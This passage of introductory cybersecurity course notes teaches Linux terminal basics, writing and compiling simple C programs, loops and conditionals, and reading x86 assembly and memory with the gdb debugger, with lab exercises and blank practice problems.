#include <stdio.h>
int main( )
{
char init1, init2;
printf("Please enter your initials: ");
scanf("%c %c", &init1, &init2);
printf("Thank you %c%c for using the program\n",
init2, init1);
}
(a) Determine the error. Note: Splitting a printf statement across two lines (as shown on lines 7-8) does not cause
any problems.
(b) What type of error is this (syntax, runtime or logical)?
42
Security Exercise 2
Part 0: Ground Rules




Do not attempt to physically alter any equipment in the lab, aside from your own laptop.
Once your instructor has verified that you have completed all portions of the security exercise, you may turn in
your completed security exercise answer sheet (the last page, where you place your answers). It is at your
instructor's discretion wether you may leave early.
While each student must be doing the security exercise on his own PC, you are free to consult and confer with
friends who are nearby. Learning from your friends is encouraged!
Safety tip:
You must be doing the security exercise during the lab session. You will have 1 point deducted from your final course grade
for each time your instructor catches you surfing the web, checking your email, or doing anything other than the security
exercise. Don’t do it!
Part 1: Starting Point
Start VMware Workstation. Click "Power on this virtual machine", which should be the virtual machine you loaded on the
first day of class.
43
You should see something similar to this mysterious screen:
So, our plan today is to run C programs in a Linux environment using VMware. To which you are probably saying:
Who am I? Why am I here?
Don’t worry! It’ll be fun!!!
We said that our goal is to “Run C programs in a Linux environment using VMware.” This likely raises three questions in your
mind:



What is this mysterious thing that you are calling “VMware”? As a related question: Do I have to come to class,
or can I attend virtually?
Linux is not Windows… and therefore I fear it. Why are you making me use this exotic operating system?
How do I run C programs? And what is for dinner in King Hall today?
44
We’ll answer each of these questions in turn.
So, first: What is VMware?
VMware allows you to “play” other operating systems on your Windows computer.
It used to be the case (about ten years ago) that if I wanted to have, say, a Windows computer, an Apple computer and
a Linux computer, I would have had to buy three separate computers: a Windows computer, an Apple computer and
a Linux computer.
More recently (about seven years ago), dual-booting became more prevalent. In this case, I could run Windows and
Linux on the same computer, but I had to choose which operating system I wanted to run—i.e., as soon as the computer
was turned on, I would be prompted to make a choice, and then I had to stick with that. If I was running Linux but
then wished to switch to Windows, I would have to restart the computer and then, when prompted, state that I wanted
the computer to run as a Windows machine.
Then, along came VMware.
VMware allows us to “play” another operating system as though it were just another application. Just as I can have a
window open with a PowerPoint application running, and a window open with a Firefox application running, I can—
using VMware—have a window open with the Linux operating system running.
So, shown below is a snapshot of my computer screen (obviously, your background and icons will be far less
interesting). Note that I am using Windows 7 as my operating system, but the VMware window that I have open is
running a Linux operating system. The Linux operating system that is running in that window works the same way
as if I bought a computer and installed Linux as the base operating system on it.
Hopefully you are saying: Wonderful, I can run Linux using VMware. So, we now reach your second question:
Why do we want to run Linux? Why not conduct EC310 just using the Windows environment?
Linux has cornered a whopping 1.5% of the desktop operating systems market share (as of April 2015). Windows
has over 90% of the market share. In fact, more people use the horror known as “Windows Vista” as use Linux.
Really, please, come on, who uses Linux? So, why would we use Linux? I mean, for reasons other than sadism.
45
First, let’s note that for server operating systems—the operating systems that do the heavy lifting of managing web
servers, managing email servers, and so forth—a different operating system—the UNIX operating system—far
surpasses Windows in market share! Well over half of all servers run a variant of UNIX.
Linux is a flavor of UNIX. But the real attraction of Linux is that it is open source. Anything and everything about
Linux is available to be viewed. There are no trade secrets.
Windows, on the other hand, is a proprietary commercial product. Microsoft only gives us the machine language
code, not the source code. So, we really do not know the inner workings of Windows. How and why Windows
operates the way it does is a trade secret.
So, by using Linux, we can understand precisely what is going on, since the entire operating system is out in the open.
And we want to understand precisely what is going on.
So… shall we write some C programs?
Well… not quite yet. First let's refresh ourselves on how the Linux directory structure is organized.
First, we will usually work within the terminal window. The terminal window is shown below.
You enter commands at the prompt. The prompt in the picture above is what says
midshipman@EC310:~ $
All users of a Linux operating system have an account name (also referred to as a user name or a login name) and a password.
When your Linux account is created, you are also given a home directory where all of your files and folders will reside. Your
home directory has the same name as your account name.
You may be wondering: Hey, I’m right now using Linux in EC310 and I was never asked for an account name and password
while logging on? That is because your textbook author (Jon Erickson) has set up your VMware software to provide Linux
“already open” for you. We have, however, changed your account name to midshipman since that is, after all, your first
name.
Even more specifically, the command line interface (where we enter commands) is called the bash shell. Every time you enter
a command, you are entering the command at the bash shell’s prompt. The bash shell’s prompt for ordinary users is the dollar
sign. Before the prompt, you will see your account name and your computer's name.
Your account name
Your computer's name
The prompt
There is one additional item in the picture above that you may have noticed: the tilde symbol (~). The tilde is an abbreviation
for your home directory. When you log in, you are placed by default in your home directory.
46
Suppose you wander up to a computer and notice that someone is logged on, and you see
then the user whose account name is joe has logged in but has forgotten to log out. Bad stuff.
If you ever forget who you are, even though your account name is staring you in the face, you can enter:
whoami
as shown below:
Go ahead… Enter whoami (you know you want to ) and confirm that you are indeed the user named midshipman.
In Linux, just as with Windows, there are files. And in Linux, just as with Windows, there are directories (in Windows
terminology, these are referred to as folders), which hold files (or other directories).
A Linux system (like a Windows system) may support multiple users. In such cases, each user is given his own home directory.
When you logon, you are automatically placed in your home directory. When Joe logs on, he is automatically placed in his
home directory. Your home directory is the natural location for any directories or files that you create. You can leave your
home directory and move to other directories. Whatever directory you find yourself in, that directory is termed your working
directory.
A portion of your Linux file system (also called a directory structure) looks like this:
At the very top is the root directory, denoted /. The root directory contains all directories and files.
Every Linux system has a special user named root. The root user is the great-and-all-powerful system administrator of the
Linux system. The root user can access any file on the system, including the files of individual users. The root user can read
the files of all users, can write over any files, and can delete any files. The root user can load any software onto the system
(e.g., programs). The root user owns the system.
The dream of all hackers is to somehow become the root user. In Linux, the root user has a special prompt, the pound sign (#).
If you walk up to a computer and see this:
47
that means the root user has logged in and left the computer unattended. That would be bad, since that would mean you could
look at all files on the system (for all users) and add any software you like to the system (including malware).
Listing Files You can list the contents of the working directory by using the ls command. In your home directory, at the
command prompt type: ls
(note this is a lower case L)
Question 1. List the contents of your working directory.
Changing Your Working Directory Right now, your working directory is the same as your home directory: midshipman.
Suppose you want to change your working directory to booksrc (see the directory structure shown above). To do this, type:
cd booksrc
When you change your working directory, the command line will update to indicate your new working directory. You should
now see your prompt as:
Working directory changed to ~/booksrc
At any time, you can travel "up" one directory by typing
cd ..
Go ahead and enter this: That is, the two letters cd, followed by a space, followed by two periods (with no space between the
periods). Note that cd stands for change directory. Since you were in the booksrc directory, you should have moved up one
level back to your home directory. In other words, you should see this:
Question 2. Starting at your home directory (where you should presently be), move up one directory and list the
contents of your new working directory.
If you are navigating around the directory structure, and you forget where you are, you can enter the command pwd which
stands for print working directory.
If you find yourself lost in the file system, you can instantly reset your working directory back to your home directory by simply
typing cd by itself (i.e., without the two periods). Go ahead and type
cd
and confirm you are back in your home directory.
Part 2: Your First C Program
Now where were we… Oh yes! The C program!
Before we begin, type the following at the prompt: cd work . That is, enter what is shown in bold below:
48
midshipman@EC310:~ $
This is the prompt
cd work
This is what you enter
Your prompt should now be
midshipman@EC310:~/work $
We will enter all of our programs in the work directory.
Question 3. List the current contents of your work directory.
We are going to enter our C program using a simple text editor named nano. Let’s name our first C program
lastname_2_1.c where you use your own last name. So, if my last name is smith, I would name this program
smith_2_1.c.
So, enter the following at the prompt (again, using your own name instead of “smith”):
midshipman@EC310:~/work $ nano smith_2_1.c
This is the prompt
This is what you enter
Why did I pick the name smith_2_1.c ? The two stands for Security Exercise 2 (i.e., we are now conducting EC310
Security Exercise 2). The one stands for your first program. So, this is your first program in Security Exercise 2.
You should see the editor opened with the correct file name at the top as shown below.
Note the file name
Now, carefully type the program below into the file smith_2_1.c
#include <stdio.h>
int main( )
{
49
}
Your screen should look like this:
Now we want to save this file. In nano, to save a file we use Control + o (that is, we press the Control key and the small letter
o key at the same time).
At that point nano will ask you if you want to still save the file under the original name. Just hit enter.
Now, exit from nano by using Control + x. You should be back to the terminal prompt:
You may now be wondering: How do I know the file that I just typed exists? Where is it?
You already know the answer! To see all of your files enter the letters ls at the command prompt. So, at the prompt, type
ls:
midshipman@EC310:~/work $ ls
and you should see:
50
So, your C file is there!
Now remember, your C program is source code. The CPU does not understand source code—it only speaks in machine
language. So we have to compile the source code into machine language using a compiler.
The compiler we will use is gcc.
So, at the prompt, compile your program by typing in gcc followed by the name of your C program. For me, I will enter:
midshipman@EC310:~/work $ gcc smith_2_1.c
Looking at the resulting screen…it looks like nothing happened. Linux just went right back to the prompt.
Ask yourself… What should have happened? Linux should have created a machine language file. Did it?
Linux automatically names the output of the C compiler as a.out. So…do you have a file named a.out?
Let’s see. Type ls at the prompt and check if you have a file named a.out.
I do! Joy!
Alright…what do we do after we compile our program? We execute it! To execute the program, we simply type a period,
followed by a slash, followed by the name of the executable code (the machine language file) at the prompt and hit enter. So,
we should type
midshipman@EC310:~/work $ ./a.out
and hit enter and… and…and…nothing happened.
Question 4. Why did nothing happen?
Part 3: A C program that does something!
It’s kind of a law of Computer Engineering that your first real program has to be a program that prints the message Hello
World! to the monitor. Since this is the Naval Academy, we will modify this and write a more appropriate program that
prints the message Hello Cruel World! to the monitor.
Here are the steps.
a) Using nano, open your existing file (for me, this file is smith_2_1.c).
b) Modify your source code so that it will print the desired message with a blank line above and a blank line below
the message. You should only need to add a single line of code to the program: a single printf statement.
Remember that to get a new line you use the escape sequence: \n .
c) Compile your program.
d) Run your program.
If all works well, you should see this:
51
Note the cruel message!
And note the blank lines around
the cruel message!
When your program works correctly, show it to your instructor or lab tech. Your instructor or lab tech will sign Question 5
on the Security Exercise.
UNIX Tips and Tricks
Are you getting tired of typing in the exact same commands again and again?
As you develop a file, you may have to open it for editing numerous times (by
typing nano smith_2_1.c) , you may have to compile it again and again (by
typing gcc smith_2_1.c), and you may have to execute it again and again
(by typing ./a.out). Engineers often find themselves typing the same
commands again and again and again.
In an effort to make life easier, UNIX (well, actually it’s the bash shell) remembers the recent commands that you
have entered at the command line. You can view the recent commands that you have entered by pressing the uparrow; each press of the up-arrow moves us back by one earlier command. So, say you want to enter
nano smith_2_1.c
and you know that you have recently entered this command. You can press the up-arrow repeatedly until you find the
command, and then hit enter. UNIX will treat this as though you have typed in the command and pressed enter.
You are urged to try this (since it allows you to avoid a huge amount of repetitive typing). Ask your instructor for
help if, after reading this, you do not understand this feature.
Enabling the mouse within the nano editor. You can make the mouse functional within the nano editor by starting
the editor with the –m option. For example:
nano –m smith_2_1.c).
Part 4: The world’s simplest calculator!
We want to write a program that will prompt the user to enter two integers. The program will then return the sum of the two
numbers. An execution of your program should look exactly like the program below, where, in this case, the user entered the
numbers 3 and 4. Your program should provide the correct answer for whatever two integers the user enters.
Shown below is the program, except it is missing three lines of code. Your task is to complete the program. So, start by
entering the program shown below as smith_2_2.c . Your goal is to replace the three comments with C code that makes
the program work as intended.
#include <stdio.h>
int main( )
{
int number1 , number2 , sum ;
52
printf("\nEnter two integers and I will tell you their sum: ");
// line of code to read in the two values from the keyboard
// line of code to add the two values together
// line of code to print out the sum
}
Demo your working program to your instructor or lab tech. Your instructor or lab tech will sign your Security Exercise for
completing the demo for Question 6.
Question 7. How much total memory is taken up by your variables in the preceding program?
Question 8. When I execute the preceding program, why do I have to run the file a.out? Why can't I just run the file
smith_2_1.c ?
53
54
Security Exercise 2 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5: _____________________________
Instructor or Lab Tech Signature
Question 6: _____________________________
Instructor or Lab Tech Signature
Question 7:
Question 8:
55
56
Chapter 3: Assembly Language and Memory
Objectives:
(a) Explain the operations of several basic assembly language commands, including mov, cmp, jmp, jle, jne and inc.
(b) Demonstrate the ability to debug a running C program in memory, to include the inspection of processor registers and
arbitrary memory locations
(c) Demonstrate the ability to analyze C programs that employ if-else statements and for loops.
(d) Apply Boolean logic to evaluate how selection structures can alter program flow.
(e) Analyze existing programs for flaws with the gdb debugger.
1. A Little More C: The if-else selection structure and the for repetition structure
The order in which program statements are executed is called flow of control. All of the programs that we have seen so far
consist of statements executed in order, one after the other. As we will see, we often need to vary the order in which statements
are executed.
1.1 The if-else statement Consider the following example
Write a program that accepts the user’s GPA as an input and prints “You’re on the Dean's List!” if her GPA is greater
than or equal to 3.5, and prints, “Keep trying!” if her GPA is less than 3.5.
Right now, we can’t solve this simple problem because we have no way for a program to choose between alternatives. To
solve this problem, C provides an instruction that allows the user to select which statements to execute based on the value of
one or more variables. This useful C instruction is the if-else statement.
The program that solves the problem above is shown below:
If the value of the variable
gpa is greater than or equal
to 3.5, all of the statements
between these two braces will
execute. The statements
within the braces after the
else are skipped.
If the value of the variable gpa
is less than 3.5, all of the
statements between these two
braces will execute. The
statements within the braces
following the if will be
skipped.
#include<stdio.h>
int main( )
{
float gpa;
printf( "Enter GPA: ");
scanf( "%f" , &gpa ) ;
if ( gpa >= 3.5 )
{
printf("\nYou’re on the Deans List!\n");
}
else
{
printf( "\nKeep trying!\n" );
}
printf( "\nGo Navy!\n\n" );
}
In the code above—immediately after the word if—we have a Boolean expression in parenthesis:
gpa >= 3.5.
A Boolean expression is an expression that always evaluates to either true or false. If this particular Boolean expression is
true (i.e., if the value of the variable gpa is indeed greater than or equal to 3.5), the statements contained within the first set
57
of braces (following the word if) will be executed, and the statements within the second set of braces (following the word
else) will be skipped.
If, on the other hand, the Boolean expression is false, the statements within the braces following the word else will execute
(and the statements within the braces following the word if will be skipped).
Shown below are two separate executions of the program shown above. Note that in both cases, the printf statement
printf( "\nGo Navy!\n\n" ); is executed.
The simplest Boolean expression compares numbers and/or variables using a comparison operator. You should be familiar
with the usual operators: >, >=, < and <=, == and !=. The table below summarizes these comparison operators.
Comparison Operator
>
>=
<
<=
==
!=
Meaning
Greater than
Greater than or equal
Less than
Less than or equal
Equal
Not equal
In C, we can check for equality by using two equals signs in a row, with no space between them. So, for example, a Boolean
expression that can be used to check if a float variable named hours is equal to forty would be
hours == 40
In C, we can check for inequality by using an exclamation sign followed by an equals sign. So, for example, a Boolean
expression that can be used to check if a char variable named grade is not equal to F would be
grade != 'F'
There are two modifications we can make to the if-else statement. The first modification is that we don’t have to have the
else part. In this case, the program performs the statements in braces following the word if when the Boolean expression
is true, and skips these statements if the Boolean expression is false. Consider our earlier program without the else portion,
and the corresponding screen captures:
#include<stdio.h>
int main( )
{
float gpa;
printf( "Enter GPA: ");
scanf( "%f" , &gpa ) ;
if ( gpa >= 3.5 )
{
printf("\nYou’re on the Deans List!\n");
}
printf( "\nGo Navy!\n\n" );
}
The second modification is that if there is only a single statement within the curly braces of the if or the else, then the braces
are optional. The programs shown above will work just as well without the braces surrounding the printf statements.
58
1.2. The for statement Many programs include some actions that must be performed again and again, some number of
times—that is, we may want to repeat sections of our program again and again. A part of a program that repeats a number of
statements is called a loop. Let's jump right into examining a program that uses a for loop, along with its corresponding
output.
#include<stdio.h>
int main()
{
int count;
for( count = 1 ; count <= 5 ; count = count + 1)
{
printf( "%d\n" , count );
}
}
Any statements within curly braces following the word for comprise the body of the loop; these statements will be executed
each time the loop iterates. In this example, there is only one statement within the body of the for loop:
printf( "%d\n" , count );
and so each time the loop iterates, the program will print out the value of the variable count, followed by a new line. The
question remains: What controls the number of times the loop will iterate?
In this example, the variable count will be used to determine the number of times the loop executes. When we enter the for
loop, the loop control variable (i.e., count) is initialized:
for( count = 1 ; count <= 5 ; count = count + 1)
This tells how the loop control variable is initialized.
This initialization occurs only once.
Next, the program checks to see if the Boolean expression is true:
for( count = 1 ; count <= 5 ; count = count + 1)
The loop control variable is compared to 5. This Boolean
expression is used to determine if the loop should execute.
Since the variable count (at this point in time) is equal to 1, the Boolean expression is true and we execute the statement in
the body of the loop. The output we see on the screen is:
When we finish executing the body of the loop, we update the loop control variable:
for( count = 1 ; count <= 5 ; count = count + 1 )
The loop control variable is updated.
The loop control variable count is now equal to 2. We once again return to the Boolean expression:
for( count = 1 ; count <= 5 ; count = count + 1)
and see that it is true (2 is indeed less than or equal to 5) and we again execute the body of the loop.
59
The screen output is now:
When we finish executing the body of the loop, we update the loop control variable:
for( count = 1 ; count <= 5 ; count = count + 1 )
and count becomes 3. We then return to the Boolean expression, note that it is true, execute the loop, and update the loop
control variable to 4. The loop executes again, and count is then updated to 5. The loop executes again (since 5 is less than
or equal to 5) and count is then updated to 6. When count is updated to 6 the Boolean expression becomes false and we
exit the loop. The final screen output is:
Note that in the for loop the initialization is done only once, and we then "bounce back and forth" between the Boolean
expression and the update of the loop control variable.
for( count = 1 ; count <= 5 ; count = count + 1 )
We bounce back and forth between
these two parts.
This is done when we first enter the loop
and never again repeated.
A flowchart for the for loop is shown below:
Initialization of loop’s
control variable
Boolean
expression
Initialization occurs only once!
True
Body
of the
loop
False
Update of loop’s
control variable
The update happens after the
body of the loop is performed!
Practice Problem 3.1
For each of the for loops shown below, state how many times the loop will iterate.
a) for( i = 1 ; i <= 100 ; i = i + 1 )
b) for( i = 3 ; i > 1 ; i = i – 1 )
c)
for( i = 7 ; i <= 21 ; i = i + 7 )
Solution:
(a)
(b)
(c)
60
Practice Problem 3.2
Examine the following C program and describe the expected output.
#include<stdio.h>
int main( )
{
int count;
for( count = 1 ; count <= 2 ; count = count + 1 )
{
if( count > 1 )
printf( "Cyber\n" );
else
printf( "Fun\n" );
}
}
Solution:
2. Machine and Assembly Language To understand the damage that an adversary can inflict on your host computer, you
have to know a little bit about programming, since, after all, a computer will only do what it is told to do, and a computer is
told to do things via programs.
But the programs—the software—are only half the story. To understand how a program can damage your computer, you have
to know how the hardware interacts with the software. We examine the relationship between software and hardware by
focusing on hardware that runs the x86 instruction set, the so-called x86 chip. This is by far the most common hardware
implementation in PCs and servers.
So, now that we know a little bit about software, let's go back to the machine!
2.1. Machine Language Examine the C program shown below. What does it do?
#include<stdio.h>
int main( )
{
int x = 7;
x = 2001;
}
Suppose we enter this program using nano, and then compile it using gcc. Remember that the gcc compiler converts the
source code (which we humans like) to machine language (which the computer likes). The machine language code is written
in the specific machine language for the x86 processor, which is the CPU in your computer. The file containing the machine
language code (i.e., the executable file) is named a.out. We can run our program by entering: ./a.out .
Remember that a CPU can only interpret very simple instructions that have been “hardwired” as electronic circuits on the CPU
chip. This set of simple hardwired instructions is termed the instruction set. Each instruction in the CPU’s instruction set has
associated with it a unique string of bits that the CPU can interpret. So, compilation converts the source code instructions to
the correct bit strings that correspond to instructions from the CPU's instruction set.
You may be wondering: If a computer can only carry out a small number of tasks (the limited number of simple instructions
that have been “hardwired” as circuits on the CPU chip), how are computers able to perform complex operations? To gain an
insight into the answer, consider that the complete works of Shakespeare, the English translation of the Bible and the US
Constitution are all written using 26 letters, a space symbol and a few punctuation symbols. Similarly, massive programs can
be built by combining the limited number of machine language instructions in various ways.
61
An
Aside
What is a.out? And why do I need to put a dot and a slash in front of a.out to
execute my program?
Since the CPU can only execute machine language instructions, a C program that you write
must be converted into a machine language program before it can be executed by the CPU.
This conversion is performed by the gcc compiler.
#include<stdio.h>
int main( )
{
int count;
....
gcc
a.out
my_program.c
By default, the compiler gives the name a.out to the file containing the machine language program. When you
recompile a program, a new a.out replaces (overwrites) any file named a.out that may already exist in the working
directory.
To execute the machine language code (i.e., to run your program), you have to specify the relative pathname to the
file named a.out. Recall that a single dot (.) can be used as a shorthand for your current working directory. Thus,
the relative path name to your machine language file is ./a.out .
Later, you will learn how to change the name of your executable code to a file name of your choosing.
So… what does the machine language program for our simple C program look like? Here is a picture of the machine language
code for our program, beginning at the line that says int main( ). 7
Machine language is supposed to be bits… where are the bits? Recall that we use hexadecimal to represent binary more
compactly. The machine language shown above is in hexadecimal.
The machine language code is on the right. On the far left are the addresses in main memory where the machine language
instructions are stored. The addresses are also presented in hexadecimal. So, let's add headings to our picture:
address
machine language instruction
7
Note that the first line of the program, #include<stdio.h>, creates object code too— but this standard program opening produces standard object
code. We are primarily interested in the part of the program that we write (which comes after the line int main( )) so we’ll only focus on that.
62
Remember that any program that you run—MSWORD, Firefox, a video game—must be in main memory. The operating
system decides where a program will actually be placed in memory. So, the line that reads
8048344:
55
8
means that at memory address 08048344 there exists the machine language instruction 55. Pictorially:
So, the first instruction listed is 55 (remember, this is all hexadecimal—think of this first instruction as 0x55).
Practice Problem 3.3
How many bits are in an address?
Solution:
Practice Problem 3.4
How many bits are represented by the hexadecimal number 55?
Solution:
And this number 0x55 means… what?
If I looked up the x86 instruction set (e.g.: at http://sparksandflames.com/files/x86InstructionChart.html ) I would see that the
instruction 55 means to push a specific specialized CPU variable into a location in memory where the CPU can retrieve it again
later.
So, if the first machine code instruction (55) takes one byte, where will the next instruction be located?
The answer: At address 08048345. Each byte has its own address, and memory is numbered sequentially.
So… why is the third instruction located at address 8048347? Shouldn’t it be 8048346?
The instruction at 8048345 ( 89 e5 ) is two bytes. So, this instruction uses addresses 8048345 and 8048346. Similarly,
we see that the next instruction consumes three bytes, so the following instruction is stored at address 804834a. (Recall, in
hexadecimal, the number after 9 is a.)
What would you guess that last machine language instruction (c3) does? If you guessed "finishes the program and returns to
the operating system", you are correct!
So, our program residing in main memory is shown below in Figure 3.1. The numbers to the left (e.g., 08048344) are the
addresses in main memory. The contents of the boxes show the values stored at the memory locations. So, memory location
08048344 holds the value 0x55.
8
Notice that in the address listing above, the very top line shows the full address, but subsequent lines do not show the leading zeros.
63
Memory Address Value Stored at this Address
Figure 3.1. Memory layout of our machine language program
I’m sure you would agree: Machine language is fun! (Don’t worry… we won’t see a lot of machine language.)
2.2. Processor Registers The CPU fetches an instruction (like the instruction 0x55 at address 0x08048374 in Figure 3.1),
decodes the instruction, and then executes the instruction. After the CPU executes an instruction, it fetches the next instruction.
The sequence of steps fetch-decode-execute repeats until the program is finished.
64
How does the CPU keep track of which instruction it is at in memory?
The CPU has some specialized variables that it uses to execute programs. Unlike variables that you declare in, say, a C program,
these CPU variables are actually implemented in high-speed hardware called registers. The x86 has 16 of these variables, each
already named and each intended for a specific purpose. Each register holds 32 bits.
The most important CPU variable is eip. Memorize this name. This variable is the Instruction Pointer 9: This variable holds
the address of the next instruction the CPU intends to execute.
Many text books refer to the instruction pointer as the program counter. These two terms are synonyms.
So, if the executable program shown at the top of the prior page is loaded into memory, the address 08048344 is placed in
eip.
Let’s add two more registers to our repertoire. You should also memorize these (along with eip):
esp:
The CPU reserves a section of memory, called the stack, to store values that the CPU might want to retrieve
later. The esp variable is used to store the address of the "top" of the stack. The name esp stands for
extended stack pointer, but it is usually just called the stack pointer.
ebp:
This variable is called the base pointer. This CPU variable is used to point to the "bottom" of the stack. (To
be more precise, we will see later that ebp actually points to the very first address after the bottom of the
stack.)
2.3. Assembly Language Okay, we want to see precisely what is going on in the CPU, but we can’t keep our sanity if we
have to look at pictures like this:
This picture shows machine language. Since we are not computers, machine language isn’t exactly intuitive to us. But unless
we can get “into” the CPU, we don’t really know what is going on. So…we have to find a way to deal with the CPU instructions
(machine language) without dealing with bits (or hexadecimal).
The answer is to use assembly language!
Remember that in assembly language, each machine instruction is replaced by an “English-like” word or mnemonic.
Looking at the machine code above, we mentioned that the last instruction, c3, had us finish execution and return to the
operating system. In assembly language, this instruction maps to ret (short for return).
There is a one-to-one mapping between the assembly language instructions and the machine language instructions. Thus,
assembly language is just an easier way to read machine language.
Our simple program:
#include<stdio.h>
int main( )
{
int x = 7;
x = 2001;
}
is shown in assembly language. For convenience, the machine language is repeated in the middle. The assembly language
appears on the right.
9
The “e” in eip stands for “extended.” The original instruction pointer was 16 bits, but it was later extended to 32 bits.
65
address
machine language instruction
assembly language instruction
Now… you might be looking at the assembly language and thinking: “That’s easier???” Well, it will take some getting used
to, but you will pick it up fast. For example, what do you think mov means? If you guessed move, you’re right. If you’re
guessing that sub means subtract, right again! And note that we see the CPU variables ebp and esp that we talked about
earlier flying around in the assembly code.
Some assembly language instructions just specify an operation and do not have any operands, e.g.:
leave
ret
Some assembly language instructions specify an operation and a single operand, e.g.:
push ebp
Some assembly language instructions specify an operation and two operands, e.g.:
mov ebp, esp
sub esp, eax
For the two-operand assembly language instructions, it is important to note that first operand is the destination and the second
operand is the source. So the instruction
mov ebp, esp
means: “Move the value of esp to ebp”
and the instruction
sub esp, eax
means: “Subtract the value of eax from esp (so that esp is reduced by the amount eax).”
Shown below is a cheat sheet of common assembly language instructions. It is suggested that you not grapple with this cheat
sheet right now. Rather, it is suggested that you refer back to it when you later encounter an assembly language instruction
that is unfamiliar.
Instruction
mov
Meaning
move
Example
mov DWORD PTR [esp],0x804848a
cmp
compare
cmp DWORD PTR [ebp],0x4
jne
jump if not
equal
jne 0x804839f
jle
jump if less
than or equal
jle 0x804839f
66
Explanation of the example
Place the value 0x804848a in the
location specified by the address in the
esp register.
Compare the value 4 to the value stored
in the address contained within the ebp
register.
This instruction will always follow a
comparison (cmp). If the two items in
the prior comparison were not equal,
then jump to the instruction stored at
address 0x804839f.
This instruction will always follow a
comparison (cmp). If the first item in
jmp
jump
jmp 0x804839f
inc
increment
inc DWORD PTR [eax]
the prior comparison is less than the
second item in the prior comparison,
then jump to the instruction stored at
address 0x804839f. For example, if
the prior comparison was cmp DWORD
PTR [ebp],0x4, then if the value
stored in the address pointed to by the
ebp register is less than or equal to 4, we
would jump to the instruction stored at
address 0x804839f.
Jump to the instruction located at
address 0x804839f.
Increment the value stored at the
memory location contained within the
eax register by one.
2.4. Program Autopsy: Case 1 Now, to really see what is going on, we can run this program one line at a time, and, at each
step in the process, examine the CPU’s special variables (the registers) and any other memory locations we care to. We can
step through an executable file and examine registers and memory by using a debugger. A debugger is a program that allows
you to test and examine other programs. Here’s how to get started:
Step 1. Start up VMware Workstation, navigate to your work directory be entering: cd work. Then using nano, open a new
file named ch3demo.c by entering: nano ch3demo.c . Then enter the following program:
#include<stdio.h>
int main( )
{
int x = 7;
x = 2001;
}
Compile the program and ensure that it contains no syntax errors (recall that to compile your program you enter gcc
ch3demo.c). Then run the program (by entering: ./a.out). You should see the results shown in the screen capture below.
Wait – what happened? This program is very simple - it merely stores and changes the value of the variable x in memory. It
doesn’t get input from the user (scanf), and it doesn’t display output either (printf), so there’s not much to see “on the
outside” when the program is run. But what’s happening “on the inside” (in memory)? The debugger will help us figure that
out.
Step 2. Start the debugger by entering the following seven lines of code. Enter the commands below (don’t include the
comments! – those are provided just to explain what is accomplished by each command). You should look at the screen
capture below to follow along as you are entering commands. Your screen should look the same!
gcc –g ch3demo.c
// The –g part of this is new! Adding this provides some extra functionality
// for the debugger.
gdb –q
// gdb is the name of the debugger. So, we are running the debugger on the
// executable file named a.out
./a.out
set dis intel
// This displays the assembly code in standard Intel lingo
list
// This repeats the source code for convenience
disassemble main
// This shows the assembly code starting with the line that has main
break main
// This sets a “breakpoint” at main. So, when we run the program, it will stop
67
// at the first line of executable code that follows the line that has main
run
// This starts executing the program up to the first line of executable code
// that follows the line that has main.
So, the program's execution is "frozen" at the first real line of code (the first line of executable code that follows the line that
has main.) So… where did the program freeze?
Practice Problem 3.5
In the screen capture above, what assembly language instruction did the program stop at—i.e., what is the next instruction
that will execute, and where in main memory is this instruction stored?
Solution:
You might be wondering: What about all the instructions before this one? Does that matter? The answer: This is code that the
compiler has generated to set up memory for the program. We can safely ignore this for now.
Since the two last assembly language instruction – leave and ret – are basically mop-up operations (all programs end with
these two instructions), we really only have to concentrate on the two lines:
0x08048354 <main+16>:
0x0804835b <main+23>:
mov
mov
DWORD PTR [ebp-4],0x7
DWORD PTR [ebp-4],0x7d1
What do we make of these two cryptic lines? To find out, we introduce two powerful commands: the info command and the
examine command.
Step 3. The info command. To look at the value of a register, we use the info (i) command. For example, to examine the
eip register, you would enter the command
68
i r eip
and to examine the esp register, you would enter the command
i r esp
Practice Problem 3.6
What is the value stored in the eip register? Does this answer make sense?
Solution:
Step 4. The examine command. To examine the value stored at a memory location, we use the examine (x) command. The
format for the x command is:
x/display_option
location we want to display
- use x for hexadecimal
- to see the contents of an address, simply use the address
- use u for decimal
- to see the contents of an address in a register, use the
- use i to display assembly language
register name preceded by a dollar sign
- use s to display the result as a string of characters
So, the command starts with an x followed by a slash. Then we tell the debugger how we would like the memory location
contents to be displayed. If we want the value to be displayed in hexadecimal, the display option is x. If we want the value to
be displayed in decimal, the display option is u.
If we want to display the contents of a memory location, we simply supply the memory location as the last argument. If we
instead want to see the contents of a memory location whose address is in a register, we supply the register name preceded by
a dollar sign.
We can also control "how much" data is displayed. By default, the debugger displays 4 bytes for its answer. If we only want
to display a single byte, we place the letter b right after the display option. To display two bytes, we place the letter h right
after the display option. To display 4 bytes, we place the letter w after the display option. To display 8 bytes, we place the
letter g after the display option.
To summarize the examine command:
Examine Command Cheat Sheet.
x/_ _
location we want to display
The first position specifies
the format for the display.
Use this table:
x
u
i
s
hexadecimal
decimal
assembly language
string
The second position
specifies the number of
items we want to
display. Use this table:
b
h
w
g
byte
half-word (2 two bytes)
word (four bytes)
giant (eight bytes)
If the foregoing paragraphs have you bewildered, do not fear! We will do many examples!
69
To see the contents of a
memory location, simply
place the memory location
here.
To see the contents of an
address whose location is
stored in a register, place the
register here, preceded by a
dollar sign (e.g., $esp)
Practice Problem 3.7
Refer to the picture shown in Figure 3-1. What should be printed out by each of the following commands? In each case, enter
the command to confirm your answer.
(a)
x/xb
0x08048354
(b)
x/xb
0x08048355
(c)
x/xb
0x08048356
(d)
x/xb
0x08048357
Solution:
(a)
(b)
(c)
(d)
The above example is depicted in the extract from Figure 3-1, shown below.
Now, recall that when we use b in the examine command, as in x/xb , the b stands for byte. When we issue the command
x/xb
0x08048354
we are saying: "Show me the contents of main memory, starting at address 0x08048384, but only going one single byte into
memory."
If we want to see the contents of memory starting at address 0x08048354, but going two bytes (i.e., a half-word) into memory,
we would enter: x/xh 0x08048354 .
Practice Problem 3.8
What do you think will be displayed by the command: x/xh 0x08048354 ? Confirm your result.
Solution:
The x86 processor stores values in so-called little-endian order, which is the sequencing of digital storage such that the least
significant byte is stored at the smallest address. This means that if I have a four byte quantity, the least significant byte goes
in the first address, the second-least-significant byte goes in the next address, and so on. So, if we are to interpret a four-byte
quantity as a single unit, the bytes must be reversed. The debugger reverses the bytes for us automatically.
This is confusing, so let's look at this a little more carefully. As we mentioned, the program is halted at the instruction at
